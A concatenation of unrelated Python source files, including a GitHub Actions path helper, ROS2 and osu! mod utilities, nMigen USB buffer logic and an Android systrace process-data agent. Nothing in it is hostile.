GHAction.addPath(expand_path)
os.environ["PATH"] = f"{expand_path}{os.pathsep}{os.environ['PATH']}"
print(os.environ["PATH"])
class GHAction:
def __init__ (self):
self.GITHUB_ = ''
@staticmethod
def addPath(pathstr):
"""
A string on a new line prepends to PATH
echo "::add-path::BAR"
"""
lout=f"::add-path::{pathstr}"
# Print an extra new line incase of missing from previous flush
print("\n", lout)
@staticmethod
def exportVariable(env, val):
"""
A string on a new line with exports a environment variable
echo "::set-env name=FOO::BAR"
"""
lout=f"::set-env name={env}::{val}"
# Print an extra new line incase of missing from previous flush
print("\n", lout )
if __name__ == "__main__":
main()
|
py | 1a40a3d4e848ea5e64e234defaccd9a416c2bb47 | #!/usr/bin/python2.7
"""
Copyright (C) 2014 Reinventing Geospatial, Inc.
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>,
or write to the Free Software Foundation, Inc., 59 Temple Place -
Suite 330, Boston, MA 02111-1307, USA.
Author: Jenifer Cochran, Reinventing Geospatial Inc (RGi)
Date: 2018-11-11
Requires: sqlite3, argparse
Optional: Python Imaging Library (PIL or Pillow)
Credits:
MapProxy imaging functions: http://mapproxy.org
gdal2mb on github: https://github.com/developmentseed/gdal2mb
Version:
"""
from pytest import raises
from scripts.geopackage.extensions.metadata.md_scope import MdScope
class TestMdScope(object):
def test_md_scope_from_text(self):
# test that all the mdscopes are properly converted from their text value
assert all([md_scope == MdScope.from_text(md_scope.value) for md_scope in MdScope])
def test_invalid_md_scope_from_text(self):
with raises(ValueError):
MdScope.from_text("NOTGOINGTOFINDTHISNnnope!!") |
py | 1a40a3d6be27e7e1414b58dc3c74644ee834f660 | import rclpy
from rclpy.time import Duration, Time
from rclpy.node import Node
from geometry_msgs.msg import TransformStamped
from tf2_ros import LookupException, ConnectivityException, ExtrapolationException
from tf2_ros.buffer import Buffer
from tf2_ros.transform_listener import TransformListener
from rclpy.qos import QoSPresetProfiles
import numpy as np
class Test(Node):
def __init__(self):
super().__init__('tf_debugger')
# create a tf2 buffer and listener
self.buffer = Buffer()
self.listener = TransformListener(self.buffer, self)
# create a tf2 broadcaster
self.pub_estim = self.create_publisher(TransformStamped, 'debug_estimation', QoSPresetProfiles.get_from_short_key('sensor_data'))
self.pub_filt = self.create_publisher(TransformStamped, 'debug_filtered', QoSPresetProfiles.get_from_short_key('sensor_data'))
def main(args=None):
rclpy.init(args=args)
node = Test()
while rclpy.ok():
rclpy.spin_once(node)
# Estimated Pose
try:
t = node.buffer.lookup_transform('world', 'chaser_0/estimated_pose', Time(seconds=0))
node.pub_estim.publish(t)
# node.get_logger().info('{}:{}'.format((t.stamp.sec, t.stamp.nanosec)))
except (LookupException, ConnectivityException, ExtrapolationException):
pass
# Filtered Pose
try:
t = node.buffer.lookup_transform('world', 'chaser_0/filtered_estimation', Time(seconds=0))
node.pub_filt.publish(t)
except (LookupException, ConnectivityException, ExtrapolationException):
pass
node.destroy_node()
rclpy.shutdown()
if __name__ == '__main__':
main() |
py | 1a40a5f41414609cf2283e130ea858378439b7e5 | ##############################################################################
## This file is part of 'L2SI Core'.
## It is subject to the license terms in the LICENSE.txt file found in the
## top-level directory of this distribution and at:
## https://confluence.slac.stanford.edu/display/ppareg/LICENSE.html.
## No part of 'L2SI Core', including this file,
## may be copied, modified, propagated, or distributed except according to
## the terms contained in the LICENSE.txt file.
##############################################################################
import ctypes
import struct
def getField(value, highBit, lowBit):
mask = 2**(highBit-lowBit+1)-1
return (value >> lowBit) & mask
def makeInt(ba):
return int.from_bytes(ba, 'little', signed=False)
c_uint64 = ctypes.c_uint64
c_uint = ctypes.c_uint
class PackedStruct(ctypes.LittleEndianStructure):
_pack_ = 1
def __str__(self):
li = []
for f in self._fields_:
if issubclass(f[1], ctypes._SimpleCData):
li.append(f'{f[0]} - {getattr(self, f[0]):x}')
else:
li.append(f'{f[0]} - {getattr(self, f[0])}')
return '\n'.join(li)
def __new__(self, ba):
return self.from_buffer_copy(ba)
def __init__(self, ba):
pass
class TransitionInfo(PackedStruct):
_fields_ = [
('dmy1', c_uint, 1),
('l0Tag', c_uint, 5),
('dmy2', c_uint, 2),
('header', c_uint, 7)]
class EventInfo(PackedStruct):
_fields_ = [
('l0Accept', c_uint, 1),
('l0Tag', c_uint, 5),
('dmy1', c_uint, 1),
('l0Reject', c_uint, 1),
('l1Expect', c_uint, 1),
('l1Accept', c_uint, 1),
('l1Tag', c_uint, 5) ]
class TriggerInfo(ctypes.Union):
_fields_ = [
('eventInfo', EventInfo),
('transitionInfo', TransitionInfo),
('asWord', ctypes.c_uint16)]
def __init__(self, word):
self.asWord = word
def isEvent(self):
return ((self.asWord & 0x8000) != 0)
class EventHeader(PackedStruct):
_fields_ = [
('pulseId', ctypes.c_uint64, 56),
('dmy1', ctypes.c_uint8),
('timeStamp', ctypes.c_uint64),
('partitions', ctypes.c_uint8),
('dmy2', ctypes.c_uint8),
('triggerInfo', ctypes.c_uint16),
('count', ctypes.c_uint32, 24),
('version', ctypes.c_uint8, 8)]
def parseEventHeaderFrame(frame, enPrint=False):
"""Given a rogue Frame representing an Event Header or Transition, parse into a dictionary of fields"""
frameSize = frame.getPayload()
ba = bytearray(frameSize)
channel = frame.getChannel()
if (enPrint):
print(f'Got Event Header frame with channel: {channel} and size: {frameSize}')
frame.read(ba, 0)
return parseBa2(ba)
def parseBa1(ba):
eh = EventHeader(ba=ba)
ti = TriggerInfo(eh.triggerInfo)
return ti
fmt = '<QQBxHLxxxxxxxx'
def parseBa2(ba):
s = struct.unpack(fmt, ba)
d = {}
d['pulseId'] = (s[0] & 0x00FFFFFFFFFFFFFF)
d['timeStamp'] = s[1]
d['partitions'] = s[2]
d['triggerInfo'] = s[3]
d['count'] = s[4] & 0x00FFFFFF
d['version'] = s[4] >> 24
return d
|
py | 1a40a6c22a09cc661a287eec2af3f35c4dd155c4 | """
Various helper functions related to dictionaries.
"""
def extend_dictionary(d1, d2):
"""
Helper function to create a new dictionary with the contents of the two
given dictionaries. Does not modify either dictionary, and the values are
copied shallowly. If there are repeats, the second dictionary wins ties.
The function is written to ensure Skulpt compatibility.
Args:
d1 (dict): The first dictionary
d2 (dict): The second dictionary
Returns:
dict: The new dictionary
"""
d3 = {}
for key, value in d1.items():
d3[key] = value
for key, value in d2.items():
d3[key] = value
return d3
|
py | 1a40a7143ec946b420fcb18cd5461330723270d7 | from django.utils import timezone
from rest_framework import serializers, status
from rest_framework.response import Response
from rest_framework.validators import UniqueTogetherValidator
from Colleges.models import Colleges
from Favorites.models import FavoriteColleges, FavoriteMajors
from Colleges.serializers import ForeignKeyCollegesSerializer
from Majors.serializers import ForeignKeyMajorsSerializer
from Users.serializers import ForeignKeyUserSerializer
class FavoriteSerializer(serializers.ModelSerializer):
"""
Base serializer for Favorites
"""
# set current_user when collect
current_user = serializers.HiddenField(
default=serializers.CurrentUserDefault()
)
add_time = serializers.DateTimeField(format='%Y-%m-%d %H: %M')
class Meta:
queryset = serializers.ModelSerializer
model = None
# repeating collecting now allowed functions
validators = UniqueTogetherValidator(
queryset=queryset,
fields=('base', 'user'),
message="Repeating collection"
)
fields = ('base', 'user', 'add_time')
class FavoriteCollegesSerializer(serializers.ModelSerializer):
"""
Serializer for Favorite colleges
"""
# set current_user when collect
current_user = serializers.HiddenField(
default=serializers.CurrentUserDefault()
)
add_time = serializers.DateTimeField(format='%Y-%m-%d %H: %M')
base = ForeignKeyCollegesSerializer()
class Meta:
model = FavoriteColleges
queryset = FavoriteColleges.objects.all()
# fields = '__all__'
fields = ('current_user', 'base', 'add_time')
def create(self, validated_data):
college, _ = Colleges.objects.get_or_create(name=validated_data['base']['name'])
fav = Colleges.objects.get(name=college)
fav_college = FavoriteColleges.objects.create(user=validated_data["current_user"],
base=fav)
return Response(fav_college, status.HTTP_201_CREATED)
class FavoriteMajorsSerializer(serializers.ModelSerializer):
"""
Serializer for Favorite Majors
"""
# set current_user when collect
current_user = serializers.HiddenField(
default=serializers.CurrentUserDefault()
)
add_time = serializers.DateTimeField(format='%Y-%m-%d %H: %M')
base = ForeignKeyMajorsSerializer()
class Meta:
model = FavoriteMajors
queryset = FavoriteMajors.objects.all()
fields = '__all__'
|
py | 1a40a798ef1a6ec9e1f9bb0edad8db6281e97519 | int_to_mod = {
0 : ["NM", "NoMod"],
1 << 0 : ["NF", "NoFail"],
1 << 1 : ["EZ", "Easy"],
1 << 2 : ["TD", "TouchDevice"],
1 << 3 : ["HD", "Hidden"],
1 << 4 : ["HR", "HardRock"],
1 << 5 : ["SD", "SuddenDeath"],
1 << 6 : ["DT", "DoubleTime"],
1 << 7 : ["RX", "Relax"],
1 << 8 : ["HT", "HalfTime"],
1 << 9 : ["NC", "Nightcore"],
1 << 10 : ["FL", "Flashlight"],
1 << 11 : ["AT", "Autoplay"],
1 << 12 : ["SO", "SpunOut"],
1 << 13 : ["AP", "Autopilot"],
1 << 14 : ["PF", "Perfect"],
1 << 15 : ["K4", "Key4"],
1 << 16 : ["K5", "Key5"],
1 << 17 : ["K6", "Key6"],
1 << 18 : ["K7", "Key7"],
1 << 19 : ["K8", "Key8"],
1 << 20 : ["FI", "FadeIn"],
1 << 21 : ["RD", "Random"],
1 << 22 : ["CN", "Cinema"],
1 << 23 : ["TP", "Target"],
1 << 24 : ["K9", "Key9"],
1 << 25 : ["CO", "KeyCoop"],
1 << 26 : ["K1", "Key1"],
1 << 27 : ["K3", "Key3"],
1 << 28 : ["K2", "Key2"],
1 << 29 : ["V2", "ScoreV2"],
1 << 30 : ["MR", "Mirror"]
}
class ModCombination():
"""
An osu! mod combination.
Notes
-----
This class only exists to allow ``Mod`` to have ``ModCombination`` objects
as class attributes, as you can't instantiate instances of your own class in
a class definition.
"""
def __init__(self, value):
self.value = value
@staticmethod
def _parse_mod_string(mod_string):
"""
Creates an integer representation of a mod string made up of two letter
mod names ("HDHR", for example).
Parameters
----------
mod_string: str
The mod string to represent as an int.
Returns
-------
int
The integer representation of the mod string.
Raises
------
ValueError
If mod_string is empty, not of even length, or any of its 2-length
substrings do not correspond to a Mod in Mod.ORDER.
"""
if mod_string == "":
raise ValueError("Invalid mod string (cannot be empty)")
if len(mod_string) % 2 != 0:
raise ValueError(f"Invalid mod string {mod_string} (not of even "
"length)")
mod = Mod.NM
for i in range(0, len(mod_string) - 1, 2):
single_mod = mod_string[i: i + 2]
# there better only be one Mod that has an acronym matching ours,
# but a comp + 0 index works too
matching_mods = [mod for mod in Mod.ORDER if \
mod.short_name() == single_mod]
# ``mod.ORDER`` uses ``_NC`` and ``_PF``, and we want to parse
# eg "NC" as "DTNC"
if Mod._NC in matching_mods:
matching_mods.remove(Mod._NC)
matching_mods.append(Mod.NC)
if Mod._PF in matching_mods:
matching_mods.remove(Mod._PF)
matching_mods.append(Mod.PF)
if not matching_mods:
raise ValueError("Invalid mod string (no matching mod found "
f"for {single_mod})")
mod += matching_mods[0]
return mod.value
def short_name(self):
"""
The acronym-ized names of the component mods.
Returns
-------
str
The short name of this ModCombination.
Examples
--------
>>> ModCombination(576).short_name()
"NC"
>>> ModCombination(24).short_name()
"HDHR"
Notes
-----
This is a function instead of an attribute set at initialization time
because otherwise we couldn't refer to a :class:`~.Mod`\s as its class
body isn't loaded while it's instantiating :class:`~.Mod`\s.
Although technically mods such as NC are represented with two bits -
DT and NC - being set, short_name removes DT and so returns "NC"
rather than "DTNC".
"""
if self.value in int_to_mod:
# avoid infinite recursion with every mod decomposing into itself
# ad infinitum
return int_to_mod[self.value][0]
component_mods = self.decompose(clean=True)
return "".join(mod.short_name() for mod in component_mods)
def long_name(self):
"""
The spelled out names of the component mods.
Returns
-------
str
The long name of this ModCombination.
Examples
--------
>>> ModCombination(576).long_name()
"Nightcore"
>>> ModCombination(24).long_name()
"Hidden HardRock"
Notes
-----
This is a function instead of an attribute set at initialization time
because otherwise we couldn't refer to :class:`~.Mod`\s as its class
body isn't loaded while it's instantiating :class:`~.Mod`\s.
Although technically mods such as NC are represented with two bits -
DT and NC - being set, long_name removes DT and so returns "Nightcore"
rather than "DoubleTime Nightcore".
"""
if self.value in int_to_mod:
return int_to_mod[self.value][1]
component_mods = self.decompose(clean=True)
return " ".join(mod.long_name() for mod in component_mods)
def __eq__(self, other):
"""Compares the ``value`` of each object"""
if not isinstance(other, ModCombination):
return False
return self.value == other.value
def __add__(self, other):
"""Returns a Mod representing the bitwise OR of the two Mods"""
return ModCombination(self.value | other.value)
def __sub__(self, other):
return ModCombination(self.value & ~other.value)
def __hash__(self):
return hash(self.value)
def __repr__(self):
return f"ModCombination(value={self.value})"
def __str__(self):
return self.short_name()
def __contains__(self, other):
return bool(self.value & other.value)
def decompose(self, clean=False):
"""
Decomposes this mod into its base component mods, which are
:class:`~.ModCombination`\s with a ``value`` of a power of two.
Parameters
----------
clean: bool
If true, removes mods that we would think of as duplicate - if both
NC and DT are component mods, remove DT. If both PF and SD are
component mods, remove SD.
Returns
-------
list[:class:`~.ModCombination`]
A list of the component :class:`~.ModCombination`\s of this mod,
ordered according to :const:`~circleguard.mod.ModCombination.ORDER`.
"""
mods = [ModCombination(mod_int) for mod_int in int_to_mod if
self.value & mod_int]
# order the mods by Mod.ORDER
mods = [mod for mod in Mod.ORDER if mod in mods]
if not clean:
return mods
if Mod._NC in mods and Mod.DT in mods:
mods.remove(Mod.DT)
if Mod._PF in mods and Mod.SD in mods:
mods.remove(Mod.SD)
return mods
class Mod(ModCombination):
"""
An ingame osu! mod.
Common combinations are available as ``HDDT``, ``HDHR``, and ``HDDTHR``.
Parameters
----------
value: int or str or list
A representation of the desired mod. This can either be its integer
representation such as ``64`` for ``DT`` and ``72`` (``64`` + ``8``) for
``HDDT``, or a string such as ``"DT"`` for ``DT`` and ``"HDDT"`` (or
``DTHD``) for ``HDDT``, or a list of strings such as ``["HD", "DT"]``
for ``HDDT``.
|br|
If used, the string must be composed of two-letter acronyms for mods,
in any order.
Notes
-----
The nightcore mod is never set by itself. When we see plays set with ``NC``,
we are really seeing a ``DT + NC`` play. ``NC`` by itself is ``512``, but
what we expect to see is ``576`` (``512 + 64``; ``DT`` is ``64``). As such
``Mod.NC`` is defined to be the more intuitive version—``DT + NC``. We
provide the true, technical version of the ``NC`` mod (``512``) as
``Mod._NC``.
This same treatment and reasoning applies to ``Mod.PF``, which we define
as ``PF + SD``. The technical version of PF is available as ``Mod._PF``.
A full list of mods and their specification can be found at
https://osu.ppy.sh/help/wiki/Game_Modifiers, or a more technical list at
https://github.com/ppy/osu-api/wiki#mods.
Warnings
--------
The fact that this class subclasses ModCombination is slightly misleading.
This is only done so that this class can be instantiated directly, backed
by an internal ModCombination, instead of exposing ModCombination to users.
"""
NM = NoMod = ModCombination(0)
NF = NoFail = ModCombination(1 << 0)
EZ = Easy = ModCombination(1 << 1)
TD = TouchDevice = ModCombination(1 << 2)
HD = Hidden = ModCombination(1 << 3)
HR = HardRock = ModCombination(1 << 4)
SD = SuddenDeath = ModCombination(1 << 5)
DT = DoubleTime = ModCombination(1 << 6)
RX = Relax = ModCombination(1 << 7)
HT = HalfTime = ModCombination(1 << 8)
_NC = _Nightcore = ModCombination(1 << 9)
# most people will find it more useful for NC to be defined as it is ingame
NC = Nightcore = _NC + DT
FL = Flashlight = ModCombination(1 << 10)
AT = Autoplay = ModCombination(1 << 11)
SO = SpunOut = ModCombination(1 << 12)
AP = Autopilot = ModCombination(1 << 13)
_PF = _Perfect = ModCombination(1 << 14)
PF = Perfect = _PF + SD
K4 = Key4 = ModCombination(1 << 15)
K5 = Key5 = ModCombination(1 << 16)
K6 = Key6 = ModCombination(1 << 17)
K7 = Key7 = ModCombination(1 << 18)
K8 = Key8 = ModCombination(1 << 19)
FI = FadeIn = ModCombination(1 << 20)
RD = Random = ModCombination(1 << 21)
CN = Cinema = ModCombination(1 << 22)
TP = Target = ModCombination(1 << 23)
K9 = Key9 = ModCombination(1 << 24)
CO = KeyCoop = ModCombination(1 << 25)
K1 = Key1 = ModCombination(1 << 26)
K3 = Key3 = ModCombination(1 << 27)
K2 = Key2 = ModCombination(1 << 28)
V2 = ScoreV2 = ModCombination(1 << 29)
MR = Mirror = ModCombination(1 << 30)
KM = KeyMod = K1 + K2 + K3 + K4 + K5 + K6 + K7 + K8 + K9 + KeyCoop
# common mod combinations
HDDT = HD + DT
HDHR = HD + HR
HDDTHR = HD + DT + HR
# how people naturally sort mods in combinations (HDDTHR, not DTHRHD)
# sphinx uses repr() here
# (see https://github.com/sphinx-doc/sphinx/issues/3857), so provide
# our own, more human readable docstrings. #: denotes sphinx docstrings.
#: [NM, EZ, HD, HT, DT, _NC, HR, FL, NF, SD, _PF, RX, AP, SO, AT, V2, TD,
#: FI, RD, CN, TP, K1, K2, K3, K4, K5, K6, K7, K8, K9, CO, MR]
ORDER = [NM, EZ, HD, HT, DT, _NC, HR, FL, NF, SD, _PF, RX, AP, SO, AT,
V2, TD, # we stop caring about order after this point
FI, RD, CN, TP, K1, K2, K3, K4, K5, K6, K7, K8, K9, CO, MR]
def __init__(self, value):
if isinstance(value, str):
value = ModCombination._parse_mod_string(value)
if isinstance(value, list):
mod = Mod.NM
for mod_str in value:
mod += Mod(mod_str)
value = mod.value
if isinstance(value, ModCombination):
value = value.value
super().__init__(value)
|
py | 1a40aaca9d2db5b93cc5641917a8520bd354da50 | import yaml
def load_config(yaml_file):
with open(yaml_file, 'r') as yam:
return yaml.load(yam)
|
py | 1a40aaf46f55a0ad0bb2830429e2ee4afc0d2a5c | #!/usr/bin/python
# encoding: utf-8
"""
@author: Ian
@file: __init__.py.py
@time: 2019-09-16 16:50
""" |
py | 1a40adc10b7a729bde53c31ed76f1e327bbd8e07 | #!/usr/bin/env python
from python.decorators import euler_timer
from python.functions import fill_count
def main(verbose=False):
count = 2
n = 50
while count <= 10 ** 6:
n += 1
count = fill_count(50, n)
return n
if __name__ == '__main__':
print euler_timer(115)(main)(verbose=True)
|
py | 1a40ae23de3325e62a1265a03af81047bf4d52c2 | from collections import OrderedDict
from nmigen import *
from nmigen.hdl.rec import *
from .endpoint import *
__all__ = ["DoubleBuffer", "InputMultiplexer", "OutputMultiplexer"]
class DoubleBuffer(Elaboratable):
def __init__(self, *, depth, width, read_ack=False):
self.w_stb = Signal()
self.w_lst = Signal()
self.w_data = Signal(width)
self.w_drop = Signal()
self.w_rdy = Signal()
self.r_stb = Signal()
self.r_lst = Signal()
self.r_data = Signal(width)
self.r_rdy = Signal()
self.r_ack = Signal(1 if read_ack else 0)
self.depth = depth
self.width = width
self.read_ack = read_ack
def elaborate(self, platform):
m = Module()
banks = [Record([("w_addr", range(self.depth)), ("w_data", self.width), ("w_en", 1),
("r_addr", range(self.depth)), ("r_data", self.width), ("r_en", 1),
("valid", 1), ("level", range(self.depth + 1))],
name="bank_{}".format(i))
for i in range(2)]
for i, bank in enumerate(banks):
mem = Memory(depth=self.depth, width=self.width)
m.submodules["mem{}_wp".format(i)] = mem_wp = mem.write_port()
m.submodules["mem{}_rp".format(i)] = mem_rp = mem.read_port(transparent=False)
m.d.comb += [
mem_wp.addr.eq(bank.w_addr),
mem_wp.data.eq(bank.w_data),
mem_wp.en.eq(bank.w_en),
mem_rp.addr.eq(bank.r_addr),
mem_rp.en.eq(bank.r_en),
bank.r_data.eq(mem_rp.data),
]
bank_lru = Signal()
with m.FSM(reset="WRITE-0") as write_fsm:
with m.State("WAIT"):
with m.If(~banks[0].valid):
m.next = "WRITE-0"
with m.Elif(~banks[1].valid):
m.next = "WRITE-1"
for i, bank in enumerate(banks):
with m.State("WRITE-{}".format(i)):
w_addr_inc = Signal.like(bank.w_addr, name_suffix="_inc")
m.d.comb += w_addr_inc.eq(bank.w_addr + 1)
m.d.comb += [
self.w_rdy.eq(1),
bank.w_en.eq(self.w_stb),
bank.w_data.eq(self.w_data),
]
with m.If(self.w_stb):
with m.If(self.w_lst):
m.d.sync += bank.w_addr.eq(0)
m.next = "WAIT"
with m.If(~self.w_drop):
m.d.sync += [
bank.valid.eq(1),
bank.level.eq(w_addr_inc),
bank_lru.eq(1 - i),
]
with m.Elif(w_addr_inc == self.depth):
# Overflow. Flush remaining bytes.
m.d.sync += bank.w_addr.eq(0)
m.next = "FLUSH"
with m.Else():
m.d.sync += bank.w_addr.eq(w_addr_inc)
with m.State("FLUSH"):
m.d.comb += self.w_rdy.eq(1)
with m.If(self.w_stb & self.w_lst):
m.next = "WAIT"
with m.FSM() as read_fsm:
with m.State("WAIT"):
with m.If(banks[0].valid & ~(banks[1].valid & bank_lru)):
m.d.comb += banks[0].r_en.eq(1)
m.d.sync += banks[0].r_addr.eq(1)
m.d.sync += self.r_lst.eq(banks[0].level == 1)
m.next = "READ-0"
with m.Elif(banks[1].valid):
m.d.comb += banks[1].r_en.eq(1)
m.d.sync += banks[1].r_addr.eq(1)
m.d.sync += self.r_lst.eq(banks[1].level == 1)
m.next = "READ-1"
for i, bank in enumerate(banks):
with m.State("READ-{}".format(i)):
r_addr_inc = Signal.like(bank.r_addr, name_suffix="_inc")
m.d.comb += r_addr_inc.eq(bank.r_addr + 1)
m.d.comb += [
self.r_stb.eq(1),
self.r_data.eq(bank.r_data),
]
with m.If(self.r_rdy):
r_done = self.r_ack if self.read_ack else self.r_lst
with m.If(r_done):
m.d.sync += bank.valid.eq(0)
m.d.sync += bank.r_addr.eq(0)
m.next = "WAIT"
with m.Else():
m.d.comb += bank.r_en.eq(1)
with m.If(r_addr_inc == bank.level):
m.d.sync += bank.r_addr.eq(0)
m.d.sync += self.r_lst.eq(1)
with m.Else():
m.d.sync += bank.r_addr.eq(r_addr_inc)
m.d.sync += self.r_lst.eq(0)
return m
class InputMultiplexer(Elaboratable):
def __init__(self):
self.sel = Record([
("addr", 4, DIR_FANIN),
("xfer", 2, DIR_FANOUT),
("err", 1, DIR_FANOUT),
])
self.pkt = Record([
("stb", 1, DIR_FANOUT),
("lst", 1, DIR_FANOUT),
("data", 8, DIR_FANOUT),
("zlp", 1, DIR_FANOUT),
("rdy", 1, DIR_FANIN),
("ack", 1, DIR_FANIN),
])
self.sof = Signal()
self._ep_map = OrderedDict()
self._addr_map = OrderedDict()
def add_endpoint(self, ep, *, addr, buffered=False):
if not isinstance(ep, InputEndpoint):
raise TypeError("Endpoint must be an InputEndpoint, not {!r}"
.format(ep))
if not isinstance(addr, int):
raise TypeError("Endpoint address must be an integer, not {!r}"
.format(addr))
if not addr in range(0, 16):
raise ValueError("Endpoint address must be between 0 and 15, not {}"
.format(addr))
if addr in self._ep_map:
raise ValueError("Endpoint address {} has already been assigned"
.format(addr))
if ep in self._addr_map:
raise ValueError("Endpoint {!r} has already been added at address {}"
.format(ep, self._addr_map[ep]))
if addr == 0 and ep.xfer is not Transfer.CONTROL:
raise ValueError("Invalid transfer type {} for endpoint 0; must be CONTROL"
.format(Transfer(ep.xfer).name))
self._ep_map[addr] = ep, buffered
self._addr_map[ep] = addr
def elaborate(self, platform):
m = Module()
port_map = OrderedDict({addr: Record.like(self.pkt) for addr in self._ep_map})
for addr, (ep, buffered) in self._ep_map.items():
port = port_map[addr]
if buffered:
dbuf = DoubleBuffer(depth=ep.max_size, width=port.data.width + port.zlp.width,
read_ack=ep.xfer is not Transfer.ISOCHRONOUS)
m.submodules["dbuf_{}".format(addr)] = dbuf
m.d.comb += [
dbuf.w_stb.eq(ep.stb),
dbuf.w_lst.eq(ep.lst),
dbuf.w_data.eq(Cat(ep.data, ep.zlp)),
ep.rdy.eq(dbuf.w_rdy),
port.stb.eq(dbuf.r_stb),
port.lst.eq(dbuf.r_lst),
Cat(port.data, port.zlp).eq(dbuf.r_data),
dbuf.r_rdy.eq(port.rdy),
dbuf.r_ack.eq(port.ack),
]
else:
m.d.comb += [
port.stb.eq(ep.stb),
port.lst.eq(ep.lst),
port.data.eq(ep.data),
port.zlp.eq(ep.zlp),
ep.rdy.eq(port.rdy),
ep.ack.eq(port.ack),
]
m.d.comb += ep.sof.eq(self.sof)
with m.Switch(self.sel.addr):
for addr, port in port_map.items():
ep, _ = self._ep_map[addr]
with m.Case(addr):
m.d.comb += [
self.sel.xfer.eq(ep.xfer),
port.connect(self.pkt),
]
with m.Default():
# Unknown endpoint.
m.d.comb += self.sel.err.eq(1)
return m
class OutputMultiplexer(Elaboratable):
def __init__(self):
self.sel = Record([
("addr", 4, DIR_FANIN),
("xfer", 2, DIR_FANOUT),
("err", 1, DIR_FANOUT),
])
self.pkt = Record([
("stb", 1, DIR_FANIN),
("lst", 1, DIR_FANIN),
("data", 8, DIR_FANIN),
("zlp", 1, DIR_FANIN),
("setup", 1, DIR_FANIN),
("drop", 1, DIR_FANIN),
("rdy", 1, DIR_FANOUT),
])
self.sof = Signal()
self._ep_map = OrderedDict()
self._addr_map = OrderedDict()
def add_endpoint(self, ep, *, addr, buffered=False):
if not isinstance(ep, OutputEndpoint):
raise TypeError("Endpoint must be an OutputEndpoint, not {!r}"
.format(ep))
if not isinstance(addr, int):
raise TypeError("Endpoint address must be an integer, not {!r}"
.format(addr))
if not addr in range(0, 16):
raise ValueError("Endpoint address must be between 0 and 15, not {}"
.format(addr))
if addr in self._ep_map:
raise ValueError("Endpoint address {} has already been assigned"
.format(addr))
if ep in self._addr_map:
raise ValueError("Endpoint {!r} has already been added at address {}"
.format(ep, self._addr_map[ep]))
if addr == 0 and ep.xfer is not Transfer.CONTROL:
raise ValueError("Invalid transfer type {} for endpoint 0; must be CONTROL"
.format(Transfer(ep.xfer).name))
self._ep_map[addr] = ep, buffered
self._addr_map[ep] = addr
def elaborate(self, platform):
m = Module()
port_map = OrderedDict({addr: Record.like(self.pkt) for addr in self._ep_map})
for addr, (ep, buffered) in self._ep_map.items():
port = port_map[addr]
if buffered:
dbuf_w_data = Cat(port.data, port.zlp, port.setup)
dbuf = DoubleBuffer(depth=ep.max_size, width=len(dbuf_w_data))
m.submodules["dbuf_{}".format(addr)] = dbuf
m.d.comb += [
dbuf.w_stb.eq(port.stb),
dbuf.w_lst.eq(port.lst),
dbuf.w_data.eq(dbuf_w_data),
dbuf.w_drop.eq(port.drop),
port.rdy.eq(dbuf.w_rdy),
ep.stb.eq(dbuf.r_stb),
ep.lst.eq(dbuf.r_lst),
Cat(ep.data, ep.zlp, ep.setup).eq(dbuf.r_data),
dbuf.r_rdy.eq(ep.rdy),
]
else:
m.d.comb += [
ep.stb.eq(port.stb),
ep.lst.eq(port.lst),
ep.data.eq(port.data),
ep.zlp.eq(port.zlp),
ep.setup.eq(port.setup),
ep.drop.eq(port.drop),
port.rdy.eq(ep.rdy),
]
m.d.comb += ep.sof.eq(self.sof)
with m.Switch(self.sel.addr):
for addr, port in port_map.items():
ep, _ = self._ep_map[addr]
with m.Case(addr):
m.d.comb += [
self.sel.xfer.eq(ep.xfer),
port.connect(self.pkt),
]
with m.Default():
# Unknown endpoint.
m.d.comb += self.sel.err.eq(1)
return m
|
py | 1a40aeab96aab6a859c416e72b5674ccd036cfd7 | # Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# Tracing agent that captures friendly process and thread data - names, pids and
# tids and names, etc to enrich display in the trace viewer. Captures snapshots
# of the output of 'ps' on the device at intervals.
import logging
import py_utils
from devil.android import device_utils
from devil.android.device_errors import AdbShellCommandFailedError
from systrace import tracing_agents
from systrace import trace_result
# Leftmost output columns match those used on legacy devices.
# Get thread names separately as there may be spaces that breaks col
# splitting.
# TODO(benm): Refactor device_utils.GetPids to get threads and use that here.
PS_COMMAND_PROC = "ps -A -o USER,PID,PPID,VSIZE,RSS,WCHAN,ADDR=PC,S,NAME,COMM" \
"&& ps -AT -o USER,PID,TID,CMD"
# Fallback for old devices.
PS_COMMAND_PROC_LEGACY = "ps && ps -t"
# identify this as trace of thread / process state
TRACE_HEADER = 'PROCESS DUMP\n'
def try_create_agent(config):
if config.target != 'android':
return None
if config.from_file is not None:
return None
return AndroidProcessDataAgent()
def get_config(options):
return options
class AndroidProcessDataAgent(tracing_agents.TracingAgent):
def __init__(self):
super(AndroidProcessDataAgent, self).__init__()
self._trace_data = ""
self._device = None
def __repr__(self):
return 'android_process_data'
@py_utils.Timeout(tracing_agents.START_STOP_TIMEOUT)
def StartAgentTracing(self, config, timeout=None):
self._device = device_utils.DeviceUtils(config.device_serial_number)
self._trace_data += self._get_process_snapshot()
return True
@py_utils.Timeout(tracing_agents.START_STOP_TIMEOUT)
def StopAgentTracing(self, timeout=None):
self._trace_data += self._get_process_snapshot()
return True
@py_utils.Timeout(tracing_agents.GET_RESULTS_TIMEOUT)
def GetResults(self, timeout=None):
result = TRACE_HEADER + self._trace_data
return trace_result.TraceResult('androidProcessDump', result)
def SupportsExplicitClockSync(self):
return False
def RecordClockSyncMarker(self, sync_id, did_record_sync_marker_callback):
pass
def _get_process_snapshot(self):
use_legacy = False
try:
dump = self._device.RunShellCommand( \
PS_COMMAND_PROC, check_return=True, as_root=True, shell=True)
except AdbShellCommandFailedError:
use_legacy = True
# Check length of 2 as we execute two commands, which in case of failure
# on old devices output 1 line each.
if use_legacy or len(dump) == 2:
logging.debug('Couldn\'t parse ps dump, trying legacy method ...')
dump = self._device.RunShellCommand( \
PS_COMMAND_PROC_LEGACY, check_return=True, as_root=True, shell=True)
if len(dump) == 2:
logging.error('Unable to extract process data!')
return ""
return '\n'.join(dump) + '\n'
|
py | 1a40aefa362ed1a451e9b56ebe9e48d09bda06be | # Copyright 2017 The Sonnet Authors. All Rights Reserved.
